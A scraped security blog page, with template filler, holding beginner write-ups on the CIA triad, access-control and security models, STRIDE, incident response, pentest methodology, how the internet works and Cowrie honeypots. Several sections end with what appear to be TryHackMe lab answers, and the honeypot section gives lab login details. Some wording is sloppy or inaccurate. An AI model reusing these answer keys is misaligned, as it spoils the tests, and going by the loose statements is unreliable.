-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • Three Things To Know About Principles Of Security

     

     

    https://www.hackingtruth.in/



    Introduction

     

    Learn the principles of information security that secures data and protects systems from abuse

    The following room is going to outline some of the fundamental principles of information security. The frameworks used to protect data and systems to the elements of what exactly makes data secure.

    The measures, frameworks and protocols discussed throughout this room all play a small part in "Defence in Depth."

    Defence in Depth is the use of multiple varied layers of security to an organisation's systems and data in the hopes that multiple layers will provide redundancy in an organisation's security perimeter.





    The CIA Triad


    The CIA triad is an information security model that is used in consideration throughout creating a security policy. This model has an extensive background, ranging from being used in 1998.


    This history is because the security of information (information security) does not start and/or end with cybersecurity, but instead, applies to scenarios like filing, record storage, etc.


    Consisting of three sections: Confidentiality, Integrity and Availability (CIA), this model has quickly become an industry standard today. This model should help determine the value of data that it applies to, and in turn, the attention it needs from the business.





    https://www.hackingtruth.in/


     



    The CIA triad is unlike a traditional model where you have individual sections; instead, it is a continuous cycle. Whilst the three elements to the CIA triad can arguably overlap, if even just one element is not met, then the other two are rendered useless (similar to the fire triangle). If a security policy does not answer these three sections, it is seldom an effective security policy.


    Whilst the three elements to the CIA triad are arguably self-explanatory, let's explore these and contextualise them into cybersecurity.

     

     

    https://www.hackingtruth.in/



    Confidentiality


    This element is the protection of data from unauthorized access and misuse. Organisations will always have some form of sensitive data stored on their systems. To provide confidentiality is to protect this data from parties that it is not intended for.


    There are many real-world examples for this, for example, employee records and accounting documents will be considered sensitive. Confidentiality will be provided in the sense that only HR administrators will access employee records, where vetting and tight access controls are in place. Accounting records are less valuable (and therefore less sensitive), so not as stringent access controls would be in place for these documents. Or, for example, governments using a sensitivity classification rating system (top-secret, classified, unclassified)

     

     

    https://www.hackingtruth.in/




    Integrity


    The CIA triad element of integrity is the condition where information is kept accurate and consistent unless authorized changes are made. It is possible for the information to change because of careless access and use, errors in the information system, or unauthorized access and use. In the CIA triad, integrity is maintained when the information remains unchanged during storage, transmission, and usage not involving modification to the information. Steps must be taken to ensure data cannot be altered by unauthorised people (for example, in a breach of confidentiality).


    Many defences to ensure integrity can be put in place. Access control and rigorous authentication can help prevent authorized users from making unauthorized changes. Hash verifications and digital signatures can help ensure that transactions are authentic and that files have not been modified or corrupted.

     

    https://www.hackingtruth.in/

     

    Availability


    In order for data to be useful, it must be available and accessible by the user.


    The main concern in the CIA triad is that the information should be available when authorised users need to access it.


    Availability is very often a key benchmark for an organisation. For example, having 99.99% uptime on their websites or systems (this is laid out in Service Level Agreements). When a system is unavailable, it often results in damage to an organisations reputation and loss of finances. Availability is achieved through a combination of many elements, including:
     

    • Having reliable and well-tested hardware for their information technology servers (i.e. reputable servers)
       
    • Having redundant technology and services in the case of failure of the primary
       
    • Implementing well-versed security protocols to protect technology and services from attack




    1) What element of the CIA triad ensures that data cannot be altered by unauthorised people?

    Ans- Integrity



    2) What element of the CIA triad ensures that data is available?

    Ans- Availavility



    3) What element of the CIA triad ensures that data is only accessed by authorised people?

    Ans- Confidentiality




    Principles of Privileges


    It is vital to administrate and correctly define the various levels of access to an information technology system individuals require.


    The levels of access given to individuals are determined on two primary factors:


    • The individual's role/function within the organisation
    • The sensitivity of the information being stored on the system

       


     

    https://www.hackingtruth.in/

     

     

    Two key concepts are used to assign and manage the access rights of individuals, two key concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (or PAM for short).



    Initially, these two concepts can seem to overlap; however, they are different from one another. PIM is used to translate a user's role within an organisation into an access role on a system. Whereas PAM is the management of the privileges a system's access role has, amongst other things.



    What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties. Other people should be able to trust what people write to.


    As we previously mentioned, PAM incorporates more than assigning access. It also encompasses enforcing security policies such as password management, auditing policies and reducing the attack surface a system faces.





    1) What does the acronym "PIM" stand for?

    Ans- Privileged identity Management



    2) What does the acronym "PAM" stand for?

    Ans- Privileged Access Management




    3) If you wanted to manage the privileges a system access role had, what methodology would you use?


    Ans- PAM




    4) If you wanted to create a system role that is based on a users role/responsibilities with an organisation, what methodology is this?

    Ans- PIM





    Security Models Continued


    Before discussing security models further, let's recall the three elements of the CIA triad: Confidentiality, Integrity and Availability. We've previously outlined what these elements are and their importance. However, there is a formal way of achieving this.


    According to a security model, any system or piece of technology storing information is called an information system, which is how we will reference systems and devices in this task.


    Let's explore some popular and effective security models used to achieve the three elements of the CIA triad.





    The Bell-La Padula Model


    The Bell-La Padula Model is used to achieve confidentiality. This model has a few assumptions, such as an organisation's hierarchical structure it is used in, where everyone's responsibilities/roles are well-defined.


    The model works by granting access to pieces of data (called objects) on a strictly need to know basis. This model uses the rule "no write down, no read up".





     

    Advantages Disadvantages
    Policies in this model can be replicated to real-life organisations hierarchies (and vice versa) Even though a user may not have access to an object, they will know about its existence -- so it's not confidential in that aspect.
    Simple to implement and understand, and has been proven to be successful. The model relies on a large amount of trust within the organisation.

     


    https://www.hackingtruth.in/

    The Bell LaPadula Model is popular within organisations such as governmental and military. This is because members of the organisations are presumed to have already gone through a process called vetting. Vetting is a screening process where applicant's backgrounds are examined to establish the risk they pose to the organisation. Therefore, applicants who are successfully vetted are assumed to be trustworthy - which is where this model fits in.





    Biba Model


    The Biba model is arguably the equivalent of the Bell-La Padula model but for the integrity of the CIA triad.


    This model applies the rule to objects (data) and subjects (users) that can be summarised as "no write up, no read down". This rule means that subjects can create or write content to objects at or below their level but can only read the contents of objects above the subject's level.


    Let's compare some advantages and disadvantages of this model in the table below:
       

       


     

    Advantages Disadvantages
    This model is simple to implement. There will be many levels of access and objects. Things can be easily overlooked when applying security controls.
    Resolves the limitations of the Bell-La Padula model by addressing both confidentiality and data integrity. Often results in delays within a business. For example, a doctor would not be able to read the notes made by a nurse in a hospital with this model.

     


    https://www.hackingtruth.in/


    The Biba model is used in organisations or situations where integrity is more important than confidentiality. For example, in software development, developers may only have access to the code that is necessary for their job. They may not need access to critic.
       
       



    1) What is the name of the model that uses the rule "can't read up, can read down"?

    Ans- The Bell-LaPadula Model



    2) What is the name of the model that uses the rule "can read up, can't read down"?


    Ans- The Biba Model




    3) If you were a military, what security model would you use?

    Ans- The Bell-LaPadula Model




    4) If you were a software developer, what security model would the company perhaps use?

    Ans- The Biba Model




    Threat Modelling & Incident Response


    Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation's information technology infrastructure and services.


    A critical stage of the threat modelling process is identifying likely threats that an application or system may face, the vulnerabilities a system or application may be vulnerable to.





    The threat modelling process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:


    • Preparation
    • Identification
    • Mitigations
    • Review






    It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:


    • Threat intelligence
    • Asset identification
    • Mitigation capabilities
    • Risk assessment



     

     

    https://www.hackingtruth.in/

     

     

     

    To help with this, there are frameworks such as STRIDE (Spoofing, identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis) infosec never tasted so good!. Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999 is still very relevant today. STRIDE includes six main principles, which I have detailed in the table below:



     

    Principle Description
    Spoofing This principle requires you to authenticate requests and users accessing a system. Spoofing involves a malicious party falsely identifying itself as another. Access keys (such as API keys) or signatures via encryption helps remediate this threat.
    Tampering By providing anti-tampering measures to a system or application, you help provide integrity to the data. Data that is accessed must be kept integral and accurate. For example, shops use seals on food products.
    Repudiation This principle dictates the use of services such as logging of activity for a system or application to track.
    Information Disclosure Applications or services that handle information of multiple users need to be appropriately configured to only show information relevant to the owner is shown.
    Denial of Service Applications and services use up system resources, these two things should have measures in place so that abuse of the application/service won't result in bringing the whole system down.
    Elevation of Privilege This is the worst-case scenario for an application or service. It means that a user was able to escalate their authorization to that of a higher level i.e. an administrator. This scenario often leads to further exploitation or information disclosure.

     





    A breach of security is known as an incident. And despite all rigorous threat models and secure system designs, incidents do happen. Actions taken to resolve and remediate the threat are known as Incident Response (IR) and are a whole career path in cybersecurity.


    Incidents are classified using a rating of urgency and impact. Urgency will be determined by the type of attack faced, where the impact will be determined by the affected system and what impact that has on business operations.


    https://www.hackingtruth.in/



     

    An incident is responded to by a Computer Security Incident Response Team (CSIRT) which is prearranged group of employees with technical knowledge about the systems and/or current incident. To successfully solve an incident, these steps are often referred to as the six phases of Incident Response that takes place, listed in the table below:




     

    Action Description
    Preparation Do we have the resources and plans in place to deal with the security incident?
    Identification Has the threat and the threat actor been correctly identified in order for us to respond to?
    Containment Can the threat/security incident be contained to prevent other systems or users from being impacted?
    Eradication Remove the active threat.
    Recovery Perform a full review of the impacted systems to return to business as usual operations.
    Lessons Learned What can be learnt from the incident? I.e. if it was due to a phishing email, employees should be trained better to detect phishing emails.

     



    1) What model outlines "Spoofing"?

    Ans- STRIDE



    2) What does the acronym "IR" stand for?

    Ans- Incident Response



    3) You are tasked with adding some measures to an application to improve the integrity of data, what STRIDE principle is this?

    Ans- Tampering



    4) An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

    Ans- Recovery





    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

     

  • Penetration Testing Fundamentals

     

     

    Penetration Testing Fundamentals




    What is Penetration Testing?


     

    Learn the important ethics and methodologies behind every pentest.
     

    Before teaching you the technical hands-on aspects of ethical hacking, you'll need to understand more about what a penetration tester's job responsibilities are and what processes are followed in performing pentests (finding vulnerabilities in a clients application or system).


    The importance and relevancy of cybersecurity are ever-increasing and can be in every walk of life. News headlines fill our screens, reporting yet another hack or data leak. Penetration Testing Fundamentals


    Cybersecurity is relevant to all people in the modern world, including a strong password policy to protect your emails or to businesses and other organisations needing to protect both devices and data from damages.


    A Penetration test or pentest is an ethically-driven attempt to test and analyse the security defences to protect these assets and pieces of information. A penetration test involves using the same tools, techniques, and methodologies that someone with malicious intent would use and is similar to an audit.


    According to Security Magazine, a cybersecurity industry magazine, there are over 2,200 cyber attacks every day - 1 attack every 39 seconds.






    Penetration Testing Ethics

     
    The battle of legality and ethics in cybersecurity, let alone penetration testing is always controversial. Labels like "hacking" and "hacker" often hold negative connotations, especially in pop culture, thanks to a few bad apples. The idea of legally gaining access to a computer system is a challenging concept to grasp -- after all, what makes it legal exactly?

    Recall that a penetration test is an authorised audit of a computer system's security and defences as agreed by the owners of the systems. The legality of penetration is pretty clear-cut in this sense; anything that falls outside of this agreement is deemed unauthorised.

    Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.

    Companies that provide penetration testing services are held against legal frameworks and industry accreditation. For example, the National Cyber Security Centre (NCSC) has the CHECK accreditation scheme in the UK. This check means that only "[CHECK]  approved companies can conduct authorised penetration tests of public sector and CNI systems and networks." (NCSC).

    Ethics is the moral debate between right and wrong; where an action may be legal, it may go against an individual's belief system of right and wrong.

    Penetration testers will often be faced with potentially morally questionable decisions during a penetration test. For example, they are gaining access to a database and being presented with potentially sensitive data. Or they are, perhaps, performing a phishing attack on an employee to test an organisation's human security. If that action has been agreed upon during the initial stages, it is legal -- however ethically questionable.

    Hackers are sorted into three hats, where their ethics and motivations behind their actions determine what hat category they are placed into. Let's cover these three in the table below:

     

     

    Hat Category Description Example
    White Hat These hackers are considered the "good people". They remain within the law and use their skills to benefit others. For example, a penetration tester performing an authorised engagement on a company.
    Grey Hat These people use their skills to benefit others often; however, they do not respect/follow the law or ethical standards at all times. For example, someone taking down a scamming site.
    Black Hat These people are criminals and often seek to damage organisations or gain some form of financial benefit at the cost of others. For example, ransomware authors infect devices with malicious code and hold data for ransom.

     

     

     

    Rules of Engagement (ROE)


    The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections (explained in the table below), which are ultimately responsible for deciding how the engagement is carried out. The SANS institute has a great example of this document which you can view online here.

     

     

     

    Section Description
    Permission This section of the document gives explicit permission for the engagement to be carried out. This permission is essential to legally protect individuals and organisations for the activities they carry out.
    Test Scopes This section of the document will annotate specific targets to which the engagement should apply. For example, the penetration test may only apply to certain servers or applications but not the entire network.
    Rules The rules section will define exactly the techniques that are permitted during the engagement. For example, the rules may specifically state that techniques such as phishing attacks are prohibited, but MITM (Man-in-the-Middle) attacks are okay.

     

     


    1) You are given permission to perform a security audit on an organisation; what type of hacker would you be?

    Ans- White Hat



    2) You attack an organisation and steal their data, what type of hacker would you be?

    Ans- Black Hat



    3) What document defines how a penetration testing engagement should be carried out?

    Ans- Rules of Engagement


     

     

    Penetration Testing Methodologies


    Penetration tests can have a wide variety of objectives and targets within scope. Because of this, no penetration test is the same, and there are no one-case fits all as to how a penetration tester should approach it.

    The steps a penetration tester takes during an engagement is known as the methodology. A practical methodology is a smart one, where the steps taken are relevant to the situation at hand. For example, having a methodology that you would use to test the security of a web application is not practical when you have to test the security of a network.


    Before discussing some different industry-standard methodologies, we should note that all of them have a general theme of the following stages:

     

     

     

    Stage Description
    Information Gathering Information Gathering This stage involves collecting as much publically accessible information about a target/organisation as possible, for example, OSINT and research. Note: This does not involve scanning any systems.
    Enumeration/Scanning This stage involves discovering applications and services running on the systems. For example, finding a web server that may be potentially vulnerable.
    Exploitation This stage involves leveraging vulnerabilities discovered on a system or application. This stage can involve the use of public exploits or exploiting application logic.
    Privilege Escalation Once you have successfully exploited a system or application (known as a foothold), this stage is the attempt to expand your access to a system. You can escalate horizontally and vertically, where horizontally is accessing another account of the same permission group (i.e. another user), whereas vertically is that of another permission group (i.e. an administrator).
    Post Exploitation This stage involves a few sub-stages: 1. What other hosts can be targeted (pivoting) 2. What additional information can we gather from the host now that we are a privileged user 3. Covering your tracks 4. Reporting

     

     

     


    OSSTMM


    The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.


    The methodology focuses primarily on how these systems, applications communicate, so it includes a methodology for:

    • Telecommunications (phones, VoIP, etc.)
    • Wired Networks
    • Wireless communications

        

     

    Penetration Testing Fundamentals

     

     

     

    Advantages Disadvantages
    Covers various testing strategies in-depth. The framework is difficult to understand, very detailed, and tends to use unique definitions.
    Includes testing strategies for specific targets (I.e. telecommunications and networking) Intentionally left blank.
    The framework is flexible depending upon the organisation's needs. Intentionally left blank.
    The framework is meant to set a standard for systems and applications, meaning that a universal methodology can be used in a penetration testing scenario. Intentionally left blank.

     

     

     

    OWASP


    The "Open Web Application Security Project" framework is a community-driven and frequently updated framework used solely to test the security of web applications and services.


    The foundation regularly writes reports stating the top ten security vulnerabilities a web application may have, the testing approach, and remediation.
       
        



    Penetration Testing Fundamentals


     

    Advantages Disadvantages
    Easy to pick up and understand. It may not be clear what type of vulnerability a web application has (they can often overlap).
    Actively maintained and is frequently updated. OWASP does not make suggestions to any specific software development life cycles.
    It covers all stages of an engagement: from testing to reporting and remediation. The framework doesn't hold any accreditation such as CHECK.
    Specialises in web applications and services. Intentionally left blank.

     


    NIST Cybersecurity Framework 1.1


    The NIST Cybersecurity Framework is a popular framework used to improve an organisations cybersecurity standards and manage the risk of cyber threats. This framework is a bit of an honourable mention because of its popularity and detail.


    The framework provides guidelines on security controls & benchmarks for success for organisations from critical infrastructure (power plants, etc.) all through to commercial.  There is a limited section on a standard guideline for the methodology a penetration tester should take.


     

     

    Penetration Testing Fundamentals

     

     

     

     

     

    Advantages Disadvantages
    The NIST Framework is estimated to be used by 50% of American organisations by 2020. NIST has many iterations of frameworks, so it may be difficult to decide which one applies to your organisation.
    The framework is extremely detailed in setting standards to help organisations mitigate the threat posed by cyber threats. The NIST framework has weak auditing policies, making it difficult to determine how a breach occurred.
    The framework is very frequently updated. The framework does not consider cloud computing, which is quickly becoming increasingly popular for organisations.
    NIST provides accreditation for organisations that use this framework. Intentionally left blank.
    The NIST framework is designed to be implemented alongside other frameworks. Intentionally left blank.

     

     

    NCSC CAF


    The Cyber Assessment Framework (CAF) is an extensive framework of fourteen principles used to assess the risk of various cyber threats and an organisation's defences against these.


    The framework applies to organisations considered to perform "vitally important services and activities" such as critical infrastructure, banking, and the likes. The framework mainly focuses on and assesses the following topics:

    •     Data security
    •     System security
    •     Identity and access control
    •     Resiliency
    •     Monitoring
    •     Response and recovery planning


     

     

     

    Advantages Disadvantages
    This framework is backed by a government cybersecurity agency. The framework is still new in the industry, meaning that organisations haven't had much time to make the necessary changes to be suitable for it.
    This framework provides accreditation. The framework is based on principles and ideas and isn't as direct as having rules like some other frameworks.
    This framework covers fourteen principles which range from security to response. Intentionally left blank.

     

     

     

    1) What stage of penetration testing involves using publicly available information?

    Ans- Information Gathering




    2) If you wanted to use a framework for pentesting telecommunications, what framework would you use? Note: We're looking for the acronym here and not the full name.

    Ans- OSSTMM



    3) What framework focuses on the testing of web applications?

    Ans- OWASP



     

     

    Black box, White box, Grey box Penetration Testing

    

    There are three primary scopes when testing an application or service. Your understanding of your target will determine the level of testing that you perform in your penetration testing engagement. In this task, we'll cover these three different scopes of testing.




    Penetration Testing Fundamentals




    Black-Box Testing


    This testing process is a high-level process where the tester is not given any information about the inner workings of the application or service.


    The tester acts as a regular user testing the functionality and interaction of the application or piece of software. This testing can involve interacting with the interface, i.e. buttons, and testing to see whether the intended result is returned. No knowledge of programming or understanding of the programme is necessary for this type of testing.


    Black-Box testing significantly increases the amount of time spent during the information gathering and enumeration phase to understand the attack surface of the target.





    Grey-Box Testing


    This testing process is the most popular for things such as penetration testing. It is a combination of both black-box and white-box testing processes. The tester will have some limited knowledge of the internal components of the application or piece of software. Still, it will be interacting with the application as if it were a black-box scenario and then using their knowledge of the application to try and resolve issues as they find them.


    With Grey-Box testing, the limited knowledge given saves time, and is often chosen for extremely well-hardened attack surfaces.






    White-Box Testing


    This testing process is a low-level process usually done by a software developer who knows programming and application logic. The tester will be testing the internal components of the application or piece of software and, for example, ensuring that specific functions work correctly and within a reasonable amount of time.


    The tester will have full knowledge of the application and its expected behaviour and is much more time consuming than black-box testing. The full knowledge in a White-Box testing scenario provides a testing approach that guarantees the entire attack surface can be validated.

       
        


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • How does the internet work?

     



    How does the internet work?


    The Blog you are reading now traveled thousands of miles from a Google Data Center to reach you.


    Let's learn how the internet works by getting to understand the details of this data's incredible journey.

    The data center which can be thousands of miles away from you has your blog article stored inside it. how does this data reach your mobile phone or a laptop?

    An easy way to achieve this goal would be with use of satellites. From the data center, a signal could be sent to the satellite via an antenna, and then from the satellite a signal could be sent to your mobile phone via another antenna near to you.


    However, this way of transmitting signals is not a good idea. Let's see why The satellite is parked nearly 22,000 miles above the earth's equator, so in order for the data transmission to be successful, the data would have to travel a total distance of 44,000 miles. Such a long distance of travel causes a significant delay in receiving the signal. More specifically it causes huge latency which is unacceptable for most internet applications. so if this video does not reach you via a satellite then how does it actually get to you?

     

     





    Well it is done with the help of a complicated network of optical fiber cables, which connect between the data center and your device. Your phone could be connected to the internet via cellular data or any Wi-Fi router, but ultimately at some point your phone will be connected to this network of optical fiber cables We saw at the beginning that the video you are currently watching is stored inside a data center. To be more specific, it is stored in a solid-state device within the data center. This SSD acts as the internal memory of a server. The server is simply a powerful computer whose job is to provide you the video, article or other stored content when you request it. Now the challenge is how to transfer the data stored in the data center specifically to your device via the complex network of optical fiber cables.



    Let's see how this is done. Before proceeding further we should first understand an important concept which is the concept of an IP address. Every device that is connected to the Internet whether it is a server a computer or a mobile phone is identified uniquely by a string of numbers known as an IP address. You can consider the IP address similar to your home address that is the address, that uniquely identifies your home. Any letter sent to you reaches you precisely because of your home address. Similarly in the internet world an IP address acts as a shipping address through which all information reaches its destination. Your internet service provider will decide the IP address of your device and you are able to see what IP address your ISP has given to your mobile phone or laptop. The server in the data center also has an IP address. The server stores a website so you can access any website just by knowing the server's IP address. However, it is difficult for a person to remember so many IP addresses.

    So to solve this problem domain names like kumaratuljaiswal.in, hackingtruth.in, udemy.com, youtube.com, facebook.com etc are used which correspond to IP addresses which are easier for us to remember than the long sequence of numbers Another thing to notice here is that a server has the capability of storing several websites and if the server consists of multiple websites all the websites cannot be accessed with the server's IP address.


    In such cases additional pieces of information, host headers are used to uniquely identify the website. However, for the giant web sites like Facebook.com or YouTube.com the entire data center infrastructure will be dedicated to the storage of the particular website. To access the internet we always use domain names instead of the complex IP address numbers.




    From where does the internet get IP addresses corresponding to our domain name requests. Well, for this purpose the internet uses a huge phone book known as DNS. If you know a person's name, but don't know their telephone number you can simply look it up in a phone book.



    The DNS server provides the same service to the internet. Your internet service provider or other organizations can manage the DNS server. Let's have a recap of the whole operation. You enter the domain name, the browser sends a request to the DNS server to get the corresponding IP address. After getting the IP address, your browser simply forwards the request to the data center, more specifically to the respective server.



    Once the server gets a request to access a particular website the data flow starts. The data is transferred in digital format via optical fiber cables, more specifically in the form of light pulses. These light pulses sometimes have to travel thousands of miles via the optical fiber cable to reach their destination.



    During their journey they often have to go through tough terrains such as hilly areas or under the sea. There are a few global companies who lay and maintain these optical cable networks. These visuals show how the laying of optical fiber cables is done with the help of a ship. A plow is dropped deep into the sea from the ship, and this plow creates a trench on the seabed and to which places the optical fiber cable.




    In fact, this complex optical cable network is the backbone of the Internet. These optical fiber cables carrying the light are stretched across the seabed to your doorstep where they are connected to a router. The router converts these light signals to electrical signals. An Ethernet cable is then used to transmit the electrical signals to your laptop.




    However if you are accessing the Internet using cellular data, from the optical cable the signal has to be sent to a cell tower and from the cell tower the signal reaches your cell phone in the form of electromagnetic waves. Since the Internet is a global network it has become important to have an organization to manage things like IP address assignment, domain name registration etc this is all managed by an institution called ICANN located in the USA. One amazing thing about the internet is its efficiency in transmitting data when compared with cellular and landline communication technologies. This video you are watching from the Google Data Center is sent to you in the form of a huge collection of zeros and ones.



    What makes the data transfer in the internet efficient is the way in which these zeros and ones are chopped up into small chunks known as packets and transmitted. Let's assume these streams of zeros and ones are divided into different packets by the server where each packet consists of six bits.

     



    Along with the bits of the video each packet also consists of the sequence number and the IP addresses of the server and your phone. With this information the packets are routed towards your phone. It's not necessary that all packets are routed through the same path and each packet independently takes the best route available at that time. Upon reaching your phone the packets are reassembled according to their sequence number. If it is the case that any packets fail to reach your phone and acknowledgement is sent from your phone to resend the lost packets. Now compare this with a postal network with a good infrastructure, but the customers do not follow the basic rules regarding the destination addresses. In this scenario letters won't be able to reach the correct destination.

     

     



    Similarly in the internet we use something called protocols for the management of this complex flow of data packets. The protocols set the rules for data packet conversion, attachment of the source and destination addresses to each packet and the rules for routers etc for different applications the protocols used are different. We hope this video has given you a good understanding about how the internet works, more specifically about the amazing journey of data packets from the data center to your mobile phone.



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • Introduction To Honeypots

     

     

    Introduction To Honeypots


     

     

    Introduction To Honeypots


    What are honeypots?


    A honeypot is a deliberately vulnerable security tool designed to attract attackers and record the actions of adversaries. Honeypots can be used in a defensive role to alert administrators of potential breaches and to distract attackers away from real infrastructure. Honeypots are also used to collect data on the tools and techniques of adversaries and assist with generating effective defensive measures.

    This room will demonstrate the Cowrie honeypot from the perspectives of an adversary and security researcher. This room will also highlight the data collected by a Cowrie honeypot deployment, some analysis methodologies, and what the gathered data tell us about typical botnet activity.




    Types of Honeypots


    Honeypot Interactivity and Classification

    A wide variety of honeypots exist so it is helpful to classify them by the level of interactivity provided to adversaries, with most honeypots falling into one of the below categories:  Introduction To Honeypots


    Low-Interaction honeypots offer little interactivity to the adversary and are only capable of simulating the functions that are required to simulate a service and capture attacks against it. Adversaries are not able to perform any post-exploitation activity against these honeypots as they are unable to fully exploit the simulated service. Examples of low-interaction honeypots include mailoney and dionaea.

    Medium-Interaction honeypots collect data by emulating both vulnerable services as well as the underlying OS, shell, and file systems. This allows adversaries to complete initial exploits and carry out post-exploitation activity. Note, that unlike, High-Interaction honeypots (see below), the system presented to adversaries is a simulation. As a result, it is usually not possible for adversaries to complete their full range of post-exploitation activity as the simulation will be unable to function completely or accurately. We will be taking a look at the medium-interaction SSH honeypot, Cowrie in this demo.

    High-Interaction honeypots are fully complete systems that are usually Virtual Machines that include deliberate vulnerabilities. Adversaries should be able (but not necessarily allowed) to perform any action against the honeypot as it is a complete system. It is important that high-interaction honeypots are carefully managed, otherwise, there is a risk that an adversary could use the honeypot as a foothold to attack other resources. Cowrie can also operate as an SSH proxy and management system for high-interaction honeypots.



    Deployment Location


    Once deployed, honeypots can then be further categorized by the exact location of their deployment:


    Internal honeypots are deployed inside a LAN. This type can act as a way to monitor a network for threats originating from the inside, for example, attacks originating from trusted personnel or attacks that by-parse firewalls like phishing attacks. Ideally, these honeypots should never be compromised as this would indicate a significant breach.

    External honeypots are deployed on the open internet and are used to monitor attacks from outside of the LAN. These honeypots are able to collect much more data on attacks since they are effectively guaranteed to be under attack at all times.






    The Cowrie SSH Honeypot


    The Cowrie honeypot can work both as an SSH proxy or as a simulated shell. The demo machine is running the simulated shell. You can log in using the following credentials:

        IP - 10.10.81.52
        User - root
        Password - <ANY>

    As you can see the emulated shell is pretty convincing and could catch an unprepared adversary off guard. Most of the commands work like how you'd expect, and the contents of the file system match what would be present on an empty Ubuntu 18.04 installation. However, there are ways to identify this type of Cowrie deployment. For example, it's not possible to execute bash scripts as this is a limitation of low and medium interaction honeypots. It's also possible to identify the default installation as it will mirror a Debian 5 Installation and features a user account named Phil. The default file system also references an outdated CPU.

     




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ ssh root@10.10.81.52            
    The authenticity of host '10.10.81.52 (10.10.81.52)' can't be established.
    RSA key fingerprint is SHA256:tag6Ip0SU0wDGK1/QLA7FVFRhGHsHtMUqktyMyNOs3E.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.81.52' (RSA) to the list of known hosts.
    Ubuntu 18.04.5 LTS
    root@10.10.81.52's password: 
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    root@acmeweb:~# whoami 
    root
    root@acmeweb:~# #www.kumaratuljaiswal.in
    
    
    





    Cowrie Logs


    Cowrie Event Logging
     

    The honeypot wouldn't be of much use without the ability to collect data on the attacks that it's subjected to. Fortunately, Cowrie uses an extensive logging system that tracks every connection and command handled by the system. You can access the real SSH port for this demo machine using the following options:

        IP - 10.10.81.52
        Port - 1400
        User - demo
        Password - demo


    Cowrie can log to a variety of different local formats and log parsing suites. In this case, the installation is just using the JSON and text logs. I've installed the JSON parser jq on the demo machine to simplify log parsing.


    Note: You may need to delete the demo machine's identity from .ssh/known_hosts as it will differ from the one used in the honeypot. You will also need to specify a port adding -p 1400 to the SSH command. The logs will also be found at /home/cowrie/honeypot/var/log/cowrie


    Log Aggregation


    The amount of data collected by honeypots, especially external deployments can quickly exceed the point where it's no longer practical to parse manually. As a result, it's often worth deploying Honeypots alongside a logging platform like the ELK stack. Log aggregation platforms can also provide live monitoring capabilities and alerts. This is particularly beneficial when deploying Honeypots, with the intent to respond to attacks rather than to collect data.






     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ ssh demo@10.10.81.52 -p 1400    
    The authenticity of host '[10.10.81.52]:1400 ([10.10.81.52]:1400)' can't be established.
    ECDSA key fingerprint is SHA256:0CHR6APzGaV/dM1GonCR0T7wJ3nJpPQ7jym2/1E33HY.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[10.10.81.52]:1400' (ECDSA) to the list of known hosts.
    demo@10.10.81.52's password: 
    Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-158-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
